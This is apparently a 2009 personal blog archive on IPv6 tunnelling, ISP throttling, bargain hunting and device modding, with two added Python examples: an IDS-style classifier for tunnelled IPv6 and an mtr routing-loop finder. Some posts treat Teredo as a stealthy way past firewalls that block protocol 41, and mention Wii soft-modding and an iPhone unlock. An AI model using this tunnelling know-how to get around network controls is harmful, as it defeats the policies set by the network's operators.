Saturday 28 November 2009

IPv6 anytime

Having IPv6 connectivity is really sweet, at times. The preferred way would be a native connection, but since there are hardly any ISPs offering IPv6 on their networks, one needs to tunnel.

Tunneling is basically accepting IPv6 traffic on a local interface, putting it into an IPv4 packet, sending it to a host in the Internet that does have IPv6 connectivity, unpacking the IPv6 packet out of the IPv4 container, and letting it go via the IPv6 network. Tunnel brokers like SixXS & HE are really good for this. They offer free connectivity, clients, instructions and what have you not, to set up a nice Any to Any tunnel.

But when you are in a network that is somehow blocking tunneled IPv6, which is easily detectable by firewalls because it is marked as protocol 41, you will not be able to set up your elegant tunnel. Public WiFi, hotels, companies: all sorts block protocol 41.

Luckily there are more options. One of the more stealthy methods is implemented in the Teredo tunnel. It is specifically designed to work behind NAT'ed devices, something the ISATAP router does not handle since it needs public IP connectivity. The 'nice' thing about ISATAP is that Vista, 7 and Windows 2008 machines will automatically configure an ISATAP interface when the name isatap is resolvable in the local domain [hint]. So if the record isatap.example.com IN A 1.1.1.100 exists, you're in business. But I digress.

Teredo is also implemented for free and automagically on your Windows machines... IF they are not a member of an Active Directory [hint]. It is also available for Linux & BSD and there is an [old] implementation that runs on OSX [including Snow Leopard] too.
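How a firewall or IDS can tell the tunnels described above apart, as an added example that is not part of the original post: protocol 41 is visible in the IPv4 header, while Teredo hides IPv6 inside UDP and has to be recognised from the payload. The UDP port 3544, the 2001::/32 prefix and the address layout are taken from RFC 4380, not from the post; all packets and addresses below are constructed from documentation ranges.

```python
import ipaddress
import struct

PROTO_UDP = 17
PROTO_IPV6_IN_IPV4 = 41     # 6in4, 6to4 and ISATAP all ride on IP protocol 41
TEREDO_PORT = 3544          # Teredo server port (RFC 4380, not from the post)
TEREDO_PREFIX = ipaddress.ip_network("2001::/32")


def decode_teredo(addr):
    """Return the IPv4 details embedded in a Teredo address, or None."""
    a = ipaddress.IPv6Address(addr)
    if a not in TEREDO_PREFIX:
        return None
    raw = a.packed
    flags, port = struct.unpack("!HH", raw[8:12])
    return {
        "server": str(ipaddress.IPv4Address(raw[4:8])),
        "flags": flags,
        # The NAT-mapped port and address are stored XORed with all ones.
        "client_port": port ^ 0xFFFF,
        "client": str(ipaddress.IPv4Address(bytes(b ^ 0xFF for b in raw[12:16]))),
    }


def _inner_ipv6(data):
    """Return (src, dst) if data starts with an IPv6 header, else None."""
    if len(data) < 40 or data[0] >> 4 != 6:
        return None
    return ipaddress.IPv6Address(data[8:24]), ipaddress.IPv6Address(data[24:40])


def _strip_teredo_indicators(data):
    """Skip Teredo authentication / origin-indication headers, if present."""
    while len(data) >= 4 and data[0] == 0 and data[1] in (0, 1):
        # 0x0001 = authentication header, 0x0000 = origin indication (8 bytes)
        data = data[13 + data[2] + data[3]:] if data[1] == 1 else data[8:]
    return data


def classify(packet):
    """Classify one raw IPv4 packet as 'proto41', 'teredo' or 'other'."""
    if len(packet) < 20 or (packet[0] >> 4) != 4 or (packet[0] & 0x0F) < 5:
        return {"kind": "other"}
    proto, payload = packet[9], packet[(packet[0] & 0x0F) * 4:]
    if proto == PROTO_IPV6_IN_IPV4:
        inner = _inner_ipv6(payload)
        return {"kind": "proto41",
                "inner": tuple(map(str, inner)) if inner else None}
    if proto == PROTO_UDP and len(payload) >= 8:
        sport, dport = struct.unpack("!HH", payload[:4])
        inner = _inner_ipv6(_strip_teredo_indicators(payload[8:]))
        if inner:
            mapped = next((decode_teredo(a) for a in inner
                           if a in TEREDO_PREFIX), None)
            # Peers talk on arbitrary ports, so also match on the prefix.
            if mapped or TEREDO_PORT in (sport, dport):
                return {"kind": "teredo", "udp_ports": (sport, dport),
                        "inner": tuple(map(str, inner)), "mapped": mapped}
    return {"kind": "other"}


# --- constructed sample packets (documentation address ranges only) ---
def _ipv4(proto, src, dst, payload):
    # Header checksum is left at 0; it is not needed for classification.
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                       proto, 0, ipaddress.IPv4Address(src).packed,
                       ipaddress.IPv4Address(dst).packed) + payload


def _ipv6(src, dst):
    return struct.pack("!IHBB16s16s", 0x60000000, 0, 59, 64,
                       ipaddress.IPv6Address(src).packed,
                       ipaddress.IPv6Address(dst).packed)


def _udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


TEREDO_ADDR = "2001:0:c000:22d:8000:63bf:34ff:8ef8"   # constructed
SAMPLES = {
    "6in4": _ipv4(41, "198.51.100.10", "192.0.2.1",
                  _ipv6("2001:db8::1", "2001:db8::2")),
    "teredo_peer": _ipv4(17, "198.51.100.10", "203.0.113.99",
                         _udp(40000, 51234, _ipv6(TEREDO_ADDR, "2001:db8::2"))),
    "teredo_server": _ipv4(17, "192.0.2.45", "198.51.100.10",
                           _udp(3544, 40000, bytes.fromhex("000063bf34ff8ef8")
                                + _ipv6("fe80::1", "fe80::2"))),
    "dns": _ipv4(17, "198.51.100.10", "192.0.2.53",
                 _udp(53000, 53, b"\x12\x34" + bytes(10))),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, classify(pkt))
```

A filter that only drops protocol 41 passes both Teredo samples; the decoded address in the peer sample also exposes the client's public IPv4 address and mapped port.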

The name is not an accident either. As on Wikipedia: "The initial nickname of the Teredo tunneling protocol was shipworm. The idea was that the protocol would pierce holes through NAT devices, much like the shipworms bore tunnels through wood. Shipworms are responsible for the loss of very many wooden hulls, but Christian Huitema in the original draft noted that "the animal only survives in relatively clean and unpolluted water; its recent comeback in several Northern American harbors is a testimony to their newly retrieved cleanliness. Similarly, by piercing holes through NAT, the service would contribute to a newly retrieved transparency of the Internet."
Christian Huitema quickly changed the name to Teredo to avoid confusion with computer worms. Teredo navalis is the Latin name of one of the best known species of shipworm."

The 'self healing capabilities' of 'the Internet' and the features in IPv6 especially, called Neighbor Discovery, open a whole class of challenges themselves. Initially for the network designers and operators but soon for malware writers too. Luckily the part of the RFC for IPv6's Type 0 Routing Header has already been deprecated. It made good ol' source routing possible, but then with 88-fold amplification. This was demonstrated at CanSecWest07 by Philippe Biondi & Arnaud Ebalard, the developers of 'scapy', a powerful interactive packet manipulation program.

Have fun and good luck getting packets flowing the way you like it.

Tuesday 17 November 2009

Treasure hunting ;)

With the 'holiday season' coming up, buying presents is at its all-time high. I like buying presents. As a matter of fact, giving presents becomes more fun with age than receiving. I guess that dates me :)

With Marktplaats in Holland & eBay as a global flea market, hunting for cheap stuff is easier than ever. But there is an angle to make it more fun, because paying too much is for tourists. So let's employ some good old SE on the matter.

A good lesson to start with is to get to know the subject. As an example let's use Steam Engines. The top of the world market is being served by the long standing traditional firm Wilesco. They've been in the steam engine market since [or slightly before] James Watt improved the concept of steam power to a usable level, and even have a Wiki page, in three languages, including Japanese [someone say market?] :)

Fan pages are a treasure trove of 'unwritten' usable information; mostly you will be looking for hobbyists and other self-proclaimed experts.

Then it's time to scour the Internets. Hit Craigslist, Marktplaats, Ricardo and other 'local' flea markets and compare the offers and prices with the 'global' eBay prices.

Of course, the Wilesco D32 is the all-time classic, with prices ranging between 1.000 and 1.500 euroos. A super collector's item is the Wilesco R200 atomkraftwerk, rare & expensive. The top spots will be a rough market and not something we amateurs want to burn our fingers on with a first try.

Since the example of the Wilesco repairman deals with a D24, I propose we start hunting for a nicely priced D24. The D24 is a powerhouse. It is the steam engine with the largest kettle volume of the whole Wilesco range.

One of the cool features of the D32 is the control panel; the D24 has that [smaller and less] too. See here:


Google "Wilesco D24" for starters and see what you come up with. Then do the same but on your local flea market and repeat it on the international eBay. There are some pretty astounding price differences to be observed. Certainly some of them can be explained based on quality and age but the local culture is a big factor too. Try to leverage that. Dealing with people from other countries used to be hard and painful. With the coming of the Internet and the disappearing of the borders in our global villages, things are getting easier by the day. Often sellers will even state if they will post items internationally and if they do not, a couple of words in their own language is a good starting point. I like to use Google's translate for that purpose.

Very good [for you] deals can be made with people who do not know what they're dealing with. Telltale signs are misspelled items, incorrectly labeled items [not mentioning the type in the description is sweet], lousy pictures [too much mess around the object, dark, unsharp] and people who are clearly selling stuff that is not theirs [from passed away family members, NOT stolen stuff!].

A deadly sin and pitfall in the process is... making a bid.

Never ever make a bid. Do not even think about it. People are lemmings: once they see -you- making your bid, they will not hesitate to overbid. With most online flea markets I have seen it is easy to start an email or Skype conversation that is out of sight of your fellow hunters. In case of eBay that is all nice and good but most sellers there do want you to bid. If it has to be, we will comply, but on our terms.

AuctionSniper is one such 'turn the table' tool. It allows for automatic & scheduled bidding. This is good for multiple reasons:
- it allows you to bid at the last second [no one can overbid]
- you do not have to sit behind your screen at odd times when specific auctions end
- most important: it takes the emotion out of your bidding

The emotion thing is where we are suckered into spending way too much on far too little. I will not even start giving examples ;) The cool feature of a scheduled bid is that it allows you to check your information sources, make up a price and forget about it. You will not get suckered into overbidding the guy who hunts for the same items and overbids you by 2 Euroos every time. No, you've set your price and either get it or do not.

I picked up a very decent D24 for <100 Euro. Sinterklaas will be proud to see the smile on the receiver's face.

Happy hunting.

Sunday 15 November 2009

IPv6 work...ed!

Apple owners were responsible for a surprisingly large number [0.238 percent] of IPv6 enabled Google users. Thanks to the wizards at Cupertino, who decided on Infinite wisdom Loop to meddle with mDNSResponder, it now cancels the queries and shuts down the socket after the first responses are in. Big chance these are A responses, so the AAAA replies will be /dev/null'ed, leaving the end user [application] with no option but to access the resource via... IPv4.

Mistakes happen, but with 10.6.2 the issue is still here.

The DHCPv6 client is not available for Mac users either. That does not help, since it's basically required to play nice with ISPs and other large network operators [large[r] companies come to mind]. Neither is there a lot of documentation on the IPv6 implementation.

Finally improving the Apple Airports with [more complete] IPv6 support is a good thing... unfortunately: it is a New Feature and as such, will NOT be available for us loyal Apple hardware buyers. Only the currently for sale AirPort Extreme & Time Capsule are lucky enough to have this 'New Feature' so you're out of luck if you thought you could snatch up a 'cheap' AirPort Express: they do not have it.

So IPv6 on my beloved Apple setup is basically broken and the future looks dim. Microsoft is miles ahead with working IPv6 since Vista. Thank G*d not too many people read this since otherwise the street credibility of OSX would be down yet another point. Microsoft's DirectAccess could develop into the first IPv6 'killer app' and that both makes me happy [IPv6 FTW!] and sad: why my BSD based OS is not leader of the pack is beyond me, except that maybe, just maybe, IPv6 is really not as much in demand as I -think- hoped it was.

As a dessert, I offer you a link that I missed before, but certainly love as much as a lot of the other work of the author.

Monday 9 November 2009

Mod'ing for fun and pleasure

The PSP, the PS, the Wii: all can be modded to allow for 'distributed backups' of your [owned OFC] games to be run. One of my daughters participated and won a contest last weekend and came home with a fresh Wii. Our first Wii we got from Austria via friends when it was just released 3 years ago and unobtainable here in Holland. The kids liked it alright, but after a couple of weeks the novelty was off and the Wii turned into a dust collector. We made someone very happy by selling it complete with the controllers, accessories & games right before New Year's Eve.

So now, 3 years later we are the happy owners of a Wii again. It came with the usual Wii Sports game, but nothing more. Blast: the box comes with only one controller, and what is more exciting than beating someone in a head-on? So let's run out and get a second controller FAST.

Configuring & connecting the device is a breeze although it is a pity there is no HDMI connectivity. After entering the 'WEP' password [riiiight] a whole Wii world opened up like a deja vu: the Wii shop & Wii credits! How could I have forgotten? Let's open the box of Pandora and soft mod it first to be able to test drive some of these distributed backups.

It takes the better part of an hour to finally get to the source of the homebrew scene. Just like with most modding software, be it for the iPhone or Wii or any other device, there are people who are scamming their arses off and want to make you pay for download links and instructions. Somehow these dudes are such experts on SEO that they manage to basically p0wn the first page of Google and make you navigate through all sorts of blogs, affiliation links and what not. After glancing over a page or 10 you get the gist of the basic requirements & tools like BannerBomb, BootMii, WiiKey and what have you not.

All pieces fall together when you find instructions in simple documents called README-HBC.txt and the like. The process is fairly simple:
Have & format your SD card, download and copy a couple of files, start the Wii, install the HomeBrew channel: done!

All in all it took longer to find the 'I accept all legal mumbo jumbo' agreement in the Wii menu to be able to access the online content of the original Wii channels than it took to mod the box. Now that Linux is running on the box, the kids can relax and spend their time breaking records & battling out competitions with friends for bragging rights.

Friday 23 October 2009

Adam Curtis makes me want to delete this blog...

Adam Curtis: "The basic fact is they gave me a website on which I put up this film, It Felt Like A Kiss and things associated with it. When I'd done that they asked what I wanted to do next. They wanted me to do all sorts of bloggy stuff and I just would not do that. I think that's so boring. It's noodling and doodling and it's exactly what I criticise the web for being - the idea that half formed, half, vague, badly researched aperçu, we used to call them, can be some new form of journalism."

Thursday 15 October 2009

Whatever happened to IPvSEXY?

IPv6 is needed, both readers of this blog know that, right? So how come the implementation is so slow?

Is it [at least locally here] the rules for lawful interception holding us back?
Is it again the question who pays for the huge investments for the equipment needed for lawful interception?
Is it the customer [me and you] not willing to pay for IPv6?
Or is it not ready for primetime?

There are hardly any technical reasons not to whet your appetite. Or it must be for the lack of consumer grade [read cheap] hardware. Set up a tunnel in a minute and go!

But where does one go on the IPv6 Internet?

Google 'IPv6' and the first hit is the Wikipedia entry for IPv6, the second is ipv6.org with the tempting page title "IPv6: The Next Generation Internet!" Sweet! But ever bothered to look at the content? It's older than my first born! It's totally outdated and not maintained. How's that for marketing?

Third hit, IPv6 (tutorial) - DD-WRT Wiki. Excellent! A cheap easy to get your hands on IPv6 able [WiFi] router. Ooops: "IPv6 is apparently NOT WORKING on all versions of DD-WRT version 24 (tested on RC5 and final). If you want IPv6 on v24, try one of the custom builds"

So, let's try another angle, google "IPv6 WRT54G" First hit leads to JoatWiki, stating "While the actual setup/configuration takes less than an hour if you know what you're doing, it make take a couple weekends to get up and running if you never done this sort of thing. You also run the risk of turning your WRT54G into a brick"

Hmm, hit two sounds promising: "Earthlink IPv6 in the Home". Earthlink, being a large ISP in the US, surely offers something more usable than the 'do it wrong and you'll brick your device', right? Well, the footer of the page might dim that expectation a little: Last modified: Wed Jul 06 18:29:15 PDT 2005. 2005, that is like a million Internet years ago! The concept is to make it so simple that there is not even a possibility to log in [http nor ssh nor telnet] to the box. That does not help unless you truly want to go IPv6 via Earthlink and I do not since I am on the other end of the world.

But let's say you, as a dedicated hobbyist, are not stopped by all the dead links and manual work to get your WRT54 up and running, or you're rich and just bought a Fritz 7270 and loaded the lab firmware version and get your IPv6 working, then what?

What is waiting out there for you? How will it feel to browse the Internet of the future? What prizes will you be able to collect to make your friends envious? Hold tight, take a seat and look at these impressive numbers:

https://fit.nokia.com/lars/meter/ipv6.html

As Lars explains: "The scripts that update this page retrieve the names of the web sites that are most popular across the globe, as well as in select countries, from alexa.com in regular intervals. They then check whether the DNS entry for each site name reflects that it uses IPv6. The numbers above show the percentage of these top sites that are IPv6-enabled, as well as the absolute numbers."

There are about 200 [yes, two hundred] IPv6 enabled sites! In the IPv4 world, back when the Internet still was DARPA's, that number was reached in 1983. Ok, I give it to you, I am comparing apples and oranges: the 200 number of IPv6 hosts are 'the most popular' sites and the 190 hosts are an absolute number, but it does show how PATHETICALLY slow IPv6 adoption is.

We celebrate single 'well known' IPv4 hosts who are accessible via IPv6 by means of a proxy. WOW hold the presses, the eagle has landed!

At the same time, the one true IPv6 pushing ISP in Holland called XS4ALL has to STOP the rollout because Legal Interception is too costly.

But there must be good news? Any news? Well on the Dutch IPv6 taskforce site, there are a stunning 5 [yes five] links listed with IPv6 news...

But why trust me and my flakey and spotty observations! Let's find some smart guys who care and actually know things. Derek Morr for instance. On his [nice to read] blog called "Living with IPv6" he made some [wishful] predictions about IPv6 deployment in 2009 and some excellent observations of the lack of good IPv6 monitoring.

Let me wrap up by making some predictions for IPv6 metrics in December, 2009:

90% of top-level domains will have IPv6 glue in the root (right now, 75% do).
50% of the DNS root servers will support IPv6 (right now, 25% do)

At AMS-IX, 1% of traffic will be native IPv6.
1400 ASes will have IPv6 prefixes.
Europe will continue to have the most allocated and deployed IPv6.


The prediction for the AMS-IX is wrong. Currently it is about 0.3% IPv6, a far cry from the predicted 1%.

What's wrong with these pictures:


Screenies taken about 3 months apart, left one first: 40.000 IPv6 domains 'disappeared' and IPv4 gained 40 days :D

Let's see what Derek Morr will come up with in a couple of months.

Bottom line: we have a need, we have a solution, we have [some] knowledge but our marketing is horrific, the customers [yes: you!] have no need and thus are not demanding [read: pay for] it. It is up to us [as ISPs and networkers as a whole] to get it out. There is good news too, of course. When you see CDNs like netflix implement IPv6 in 2 [yes, TWO!] months, you know it is really possible... even if they too are a little scared to let 'normal' users access their service via IPv6 and 'hide it' in an IPv6 subdomain.

Pair that with this news flash: "In the first nine months of 2009, the American Registry for Internet Numbers (ARIN) received 300 requests from carriers for blocks of IPv6 address space. This compares to 250 requests received in all of 2008 and 2007." and it just looks like there is some real IPv6 work being done.

Now let's see how IPvSexy will actually make a real life comeback and fulfil its destiny.

PS For those with love for numbers, the Ghost Route Hunter by SixXS is a must bookmark.

Wednesday 30 September 2009

Posting drafts: duh!

It happens at moments I am not paying any real attention to the posting itself. Something arouses my typing finger and boom, off it goes. I forget a picture, links, spell checking, and post outright nonsense that is soo totally off the wall not even the conspiracy specialists see anything useful in it.

So what do you do with incorrectly posted material? Of course I have the option to alter the text and up scale it and even to retract it, but that feels like cheating. It's like clearing up that blatant hole 'someone' left in the firewall ruleset and silently close it... it's just wrong. It's wrong because errors are an excellent stepping stone to knowledge.

As a rule I like asking the people I work for|with "So how many major incidents have you seen lately". The answer is often more revealing than one might expect. The classics are "None!" and "Define incident" and "That is classified". The one I really like is "One major last 6 to 12 months".

Companies claiming 'none' are more at risk than the others. Things -do- go wrong, and you not knowing is plain dangerous. The people asking for clarification work in a back stabbing culture where bad news shall and will be punished and thus manipulated till the color scheme of the report is all white, yellow and green. The final answer "one" gives me an indication that "major incident" is a weighted value where the worst incident of the year is major, a nice relative scale that I feel most comfortable with. Threats and risk do change, no matter what metrics one uses, no matter how many 'risk managers' and 'risk analysis standards' one uses.

Good [and a little lucky] security officers have the gift to correctly context incidents and know when things are really going downhill and when incidents are more defcon red in the political arena. Both require a different approach and a different toolset. Most of us love technology issues:
- Man in the Browser
- Sly holes in firewall
- Rogue route advertisements
- Script kiddies
- Lack of bandwidth
- Application layer exploits
- Arp storms

These are in our comfort zone: we deal with them daily and enjoy the puzzle and the diffs we see in the pre and after traffic dumps. A few people I have met in the availability scene like the part of corporate culture where the presentations kick in. The moments of debriefing not-so-hot technical aspects to people who know more about golf clubs than we know about ASM. However, more often than not, that is where the real difference is made: they p0wn the resources and set the priorities.

So when I go out and look for a person to lead the availability department, I look for the person who gets his coffee from the machine that is closest to the techies. The person who actually gets the autistic CCIE to share anecdotes about his holiday and at the same time dares to make a remark about the drawing at the whiteboard.

They're few and far between but easy to spot as they stand out like a wolf among sheep.

PS Click on the picture. It will take you to a free download of the whole album of 'The Slew'. A band that just loves to mingle rock, instruments & DJ's in a refreshing mix that is a perfect example how a healthy mix of different 'character & ability' upscales the individual parts of the sum.

Tuesday 29 September 2009

IPv6? Nowhere to be found!

IPv6 has basically disappeared from the wireless router landscape. Try finding a current one < 100 euro. Except for some obscure releases, like the DIR-615 Wireless b/g/n Router but only the hardware revision C with firmware 3.01

Hard to find, and certainly online nearly impossible to get any assurance about the hardware revision level.

Oh wait, my good old loyal WRT54G [V4 with plenty of RAM] to the rescue! Oh no, not now, with the current 2.6 kernel and the open source b43 broadcom chipset and its issues. Only with kernel 2.4 and its 'limited' IPv6 support. You can roll your own WRT54 dd-wrt, if you feel adventurous, but the drawback is that there is no way to use the GUI. Not a nice plan if you plan to send the devices to parts far far away from home to end users.

There is the Fritz!Box 7270 but that goes for about 200 euro. That is nearly Cisco level pricing. And only with a lab release of the firmware, that is RC in the dialect of the rest of the software world. Cisco of course does support IPv6 too but using the word Cisco and a price tag of <100 is like demanding justice from an African dictator.

So is there no solution? Oddly enough, there is... and it is produced by Apple: the AirPort Extreme [and the AirPort TimeCapsule but for a >100 price tag]. Unfortunately there are a gazillion stability issues, especially in combination with Apple MBP's, but they do IPv6 well with a simple interface.

Frustrating.

Not too bad! Native IPv6 ADSL for 7 euroos a month.
http://www.introweb.net/producten/categorien/internet_toegang/economy_adsl/ipv6_adsl.shtml

And Fritz!Box 7270 is indeed the only commercial IPv6 enabled home grade device available, also used by XS4ALL

Tuesday 8 September 2009

THE POET

after a steaming performance
adored by a sold-out crowd
the sweet smell of success in the skull
the poet was disappointed
that no one on the Afsluitdijk
stands waving little flags

that once so cheered adored one
entertaining thought-provoking brainwashing
who got every hand clapping
switches on the television at home
like a burnt-out fireman

Ton Lebbink

Friday 28 August 2009

IPv6

Finally!

http://[2a01:198:200:5e4::2]/

SixXS tunnel, not native yet, how on earth is it possible that LARGE colocs still do not support native IPv6?
No AAAA record yet, how on earth is it possible that LARGE registrars still do not support IPv6?
No native IPv6 from my ISP, how on earth is it possible that LARGE ISPs still do not support native IPv6?

Like John Curran makes clear, it has to be "the boy that cried wolf" syndrome. See for yourself:

Monday 24 August 2009

UPC throttling ALL traffic, not specific.


Of course QoS is important to the customer. I am one myself. I like getting what I pay for. I understand Internet traffic costs money and I am [willingly] paying for it. So when UPC decided to cut all bandwidth between 12:00 and 00:00 by 2/3 to ensure QoS, so that all customers would be able to enjoy Internet access at expected speeds, I was a little worried.

Well, my browsing the Internet experience has not changed too much.

But what did change a lot was my usenet experience. Is: Download speed: 638.85 KB/s. Was: [Avg-Speed]: 1895kB/s. That is drastic but expected, right? WRONG.

UPC is not just throttling Internet access, it throttles ALL traffic.

My traceroute [v0.75]
macbookpro-meij-net.local (0.0.0.0) Mon Aug 24 22:59:35 2009
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss% Snt Last Avg Best Wrst StDev
1. 10.0.1.1 0.0% 455 1.2 1.3 0.7 14.7 1.5
2. 10.15.158.129 0.0% 455 4.4 8.4 2.6 34.3 4.1
3. p21161.net.upc.nl 0.0% 455 6.7 10.6 4.2 57.0 7.0
4. 84.116.131.21 0.0% 455 5.7 13.9 4.6 78.4 12.6
5. 10ge-upc.xmr16-1.ams5.as5580.net 0.0% 454 12.2 14.0 5.0 47.6 6.0
6. ???

My usenet traffic never hits 'the Internet', it goes straight out to XSNews. XSNews is my current [and good!] usenet provider. I hope they will resolve this issue with UPC.

Monday 17 August 2009

All your secrets are belong to us

Nifty site ;)

Especially when people use their GPS enabled cams

Monday 10 August 2009

Ze Frank in Amsterdam!

I am sure all who read this know Ze Frank and spent countless hours in awe and amazement. If you do not, shame on you! Go google the master. But do not take my word for it, read what Scot Trent has to say: "By the Keillor standard of diversity, intelligence, and talent, ze Frank sings, composes, has a depth beyond most of us and is more prolific than any one person."

So this week [Friday the 21st.] Ze Frank will be in Amsterdam at the "Pluk de nacht" festival.

Monday 3 August 2009

iPhone + redsn0w == Waiting for reboot SOLVED!


It took me the better part of a full day, lots of google hits, lots of options, lots of everything.

First, make sure you got the proper files [# openssl sha1 'filename']:
iPhone1,1_3.0_7A341_Restore.ipsw SHA1 2afd3f8ede17390737f508473ed205506a0bd23f
bl39.bin SHA1 8ec565fe026d3f642dbe836c0fdc80f06844603b
bl46.bin SHA1 fd4825ffe5727dcc30e4c70dc78908838d498822
[not too many people care about these it seems...]

And the real solution was simpler than anything: While redsn0w shows the dreaded "waiting for reboot" screen, just unplug the USB cable and replug it. Done. All fine. iPhone unlocked and updated to version 3.0.1

Thanks to iLeoMarc on the MacRumors forums.

Sunday 2 August 2009

Not found by google?


There are some queries that google has only one answer for, some are here.

"mokum's iphone" is one. In the [faint] hope that someone will once type "mokum's iPhone" in Google after laying her|his hands on my phone and trying to find the original owner: now you've got a chance. Contact me and I am sure we will work out a deal that satisfies all involved parties.

Having said that, I would like a moment to thank Apple, GeoHot & the iPhone dev-team for letting me and many others use this amazing device, with any provider -I- like.


And another one, while messing with remote syslog on OSX:
syslogd 31783 FS_WRITE_DATA SBF /private/var/log/asl/StoreData
FS_WRITE_DATA SBF /private/var/log/asl/StoreData 13 (seatbelt)

Thursday 30 July 2009

OpenDNS, in Holland soon.

Some days ago I read something about OpenDNS [thinking of] getting a new location [AMS-IX] for their excellent DNS service. Since it is based on anycast, end users need not change any addresses in order to benefit from the added location. Silly me, I can't find the article anymore.

Last week I had some issues with slow DNS lookups/slow Internet on Leopard again. It is plagued with issues. My setup with an Apple Airport and Apple iPhones, and an iMac, a G4 & more [all running 10.5.7] is often experiencing issues with name resolving. Unfortunately, I am not the only one with this. I have googled my arse off and tried every 'tip' I found, from turning off IPv6 in Firefox & the Airport & on my laptop to moving the resolving from my laptop to the Airport. Nothing works reliably.

Last week however the issue was another:

My traceroute [v0.75]
macbookpro-meij-net.local (0.0.0.0) Thu Jul 30 01:40:51 2009
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss% Snt Last Avg Best Wrst StDev
1. 10.0.1.1 0.0% 96 1.0 1.3 0.7 4.2 0.7
2. 10.15.158.129 0.0% 96 8.3 9.7 6.8 33.1 3.8
3. 212.142.21.161 0.0% 96 69.4 12.1 7.6 69.4 8.5
4. 212.142.32.65 0.0% 96 13.3 11.3 7.0 32.2 3.5
5. 213.46.183.93 82.1% 96 8.9 11.7 8.3 24.5 4.5
6. 84.116.131.6 87.4% 96 10.0 12.2 8.9 31.8 6.3
7. 213.46.183.93 80.2% 96 9.1 10.5 8.2 18.8 2.7
8. 84.116.131.6 95.8% 96 19.2 15.0 11.6 19.2 4.0
9. 213.46.183.93 82.3% 96 16.8 11.9 8.9 20.6 3.5
10. 84.116.131.6 93.7% 96 9.0 12.5 9.0 26.8 7.0
11. 213.46.183.93 82.3% 96 10.3 11.8 8.4 31.6 5.6
12. 84.116.131.6 95.7% 95 9.4 12.3 9.4 17.4 3.7
13. 213.46.183.93 76.5% 86 9.9 13.0 8.9 33.5 6.5
14. ???
15. 213.46.183.93 83.5% 80 11.8 10.5 8.7 12.3 1.2
16. ???
17. 213.46.183.93 82.9% 77 10.6 10.3 8.2 16.7 2.2
18. 84.116.131.6 95.7% 24 11.7 11.7 11.7 11.7 0.0

A simple routing loop at my provider. It took me over 30 minutes to find, focused as I was on the 'normal' DNS problems with OSX. Only after the reliable 'turn Airport off' & 'turn Airport on' trick did not work I checked the availability of the OpenDNS servers...
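Spotting that loop mechanically, as an added example that is not part of the original post: a router that answers at two different TTLs means the path has folded back on itself. The rows in `LOOP_TRACE` and `CLEAN_TRACE` are copied from the two traceroutes on this page; the function names are hypothetical.

```python
import re

# One mtr report row: "<ttl>. <host> <loss>% <sent> ..." or "<ttl>. ???"
ROW = re.compile(r"^\s*(\d+)\.\s+(\S+)(?:\s+([\d.]+)%)?")


def parse_mtr(text):
    """Return [(ttl, host or None, loss% or None), ...] from mtr output."""
    hops = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            host = None if m.group(2) == "???" else m.group(2)
            loss = float(m.group(3)) if m.group(3) else None
            hops.append((int(m.group(1)), host, loss))
    return hops


def find_loop(hops):
    """Report the first router that answers at two different TTLs."""
    first_seen = {}
    for ttl, host, _ in hops:
        if host is None:            # unanswered probe, tells us nothing
            continue
        if host in first_seen:
            start = first_seen[host]
            routers = [h for t, h, _ in hops if start <= t < ttl and h]
            return {"enters_at": start, "period": ttl - start,
                    "routers": routers}
        first_seen[host] = ttl
    return None


# Rows copied from the 30 July traceroute above (the looping path).
LOOP_TRACE = """\
Host Loss% Snt Last Avg Best Wrst StDev
1. 10.0.1.1 0.0% 96 1.0 1.3 0.7 4.2 0.7
2. 10.15.158.129 0.0% 96 8.3 9.7 6.8 33.1 3.8
3. 212.142.21.161 0.0% 96 69.4 12.1 7.6 69.4 8.5
4. 212.142.32.65 0.0% 96 13.3 11.3 7.0 32.2 3.5
5. 213.46.183.93 82.1% 96 8.9 11.7 8.3 24.5 4.5
6. 84.116.131.6 87.4% 96 10.0 12.2 8.9 31.8 6.3
7. 213.46.183.93 80.2% 96 9.1 10.5 8.2 18.8 2.7
8. 84.116.131.6 95.8% 96 19.2 15.0 11.6 19.2 4.0
14. ???
"""

# Rows copied from the 24 August traceroute on this page (no loop).
CLEAN_TRACE = """\
1. 10.0.1.1 0.0% 455 1.2 1.3 0.7 14.7 1.5
2. 10.15.158.129 0.0% 455 4.4 8.4 2.6 34.3 4.1
3. p21161.net.upc.nl 0.0% 455 6.7 10.6 4.2 57.0 7.0
4. 84.116.131.21 0.0% 455 5.7 13.9 4.6 78.4 12.6
5. 10ge-upc.xmr16-1.ams5.as5580.net 0.0% 454 12.2 14.0 5.0 47.6 6.0
6. ???
"""

if __name__ == "__main__":
    print(find_loop(parse_mtr(LOOP_TRACE)))
    print(find_loop(parse_mtr(CLEAN_TRACE)))
```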

Other sillies with OSX:
- Calling an IP address in the 169.254./16 range 'self assigned' even if you get it from a DHCP server
- Falling back to 'old' IP addresses even if a new lease has been accepted and used
- Slow poke ethernet link setup [need to nail arp settings to flash routers fast enough]

Tuesday 14 July 2009

Israel distributes libido-increasing gum, and I want some!

Hamas: Israel distributes libido-increasing gum in Gaza


Islamist group claims Israeli intelligence operatives transfer merchandise to Gaza dealers that increases sex drive, even encourage them to distribute them free of charge in order 'to destroy' young generation. Affair exposed after young girl chews gum, complains of bizarre side effects

Is Israel targeting the Palestinian population in Gaza by distributing libido-increasing chewing gum in the Strip? A Hamas police spokesman in the Gaza Strip Islam Shahwan claimed Monday that Israeli intelligence operatives are attempting to "destroy" the young generation by distributing such materials in the coastal enclave.

Shahwan said that the police got their hands on gum that increases sexual desire that, according to him, reaches merchants in the Strip by way of the border crossings. According to him, a Palestinian drug dealer admitted that he sold products that increase sex drive. The dealer said that he received the materials from Israeli sources by way of the Karni crossing.

A number of suspects have been arrested.

The affair was exposed when a Palestinian filed a complaint that his daughter chewed the aforementioned gum and experienced the dubious side effects.

Shahwan even claimed that Israeli intelligence operatives encourage dealers in Gaza to distribute the gum for free.

"The Israelis seek to destroy the Palestinians' social infrastructure with these products and to hurt the young generation by distributing drugs and sex stimulants," said Shahwan.
However, he noted that drugs reach the Gaza Strip by way of Rafah tunnels, and said that the police keep a close watch on the illegal activities going on in the tunnels between Gaza and Egypt.

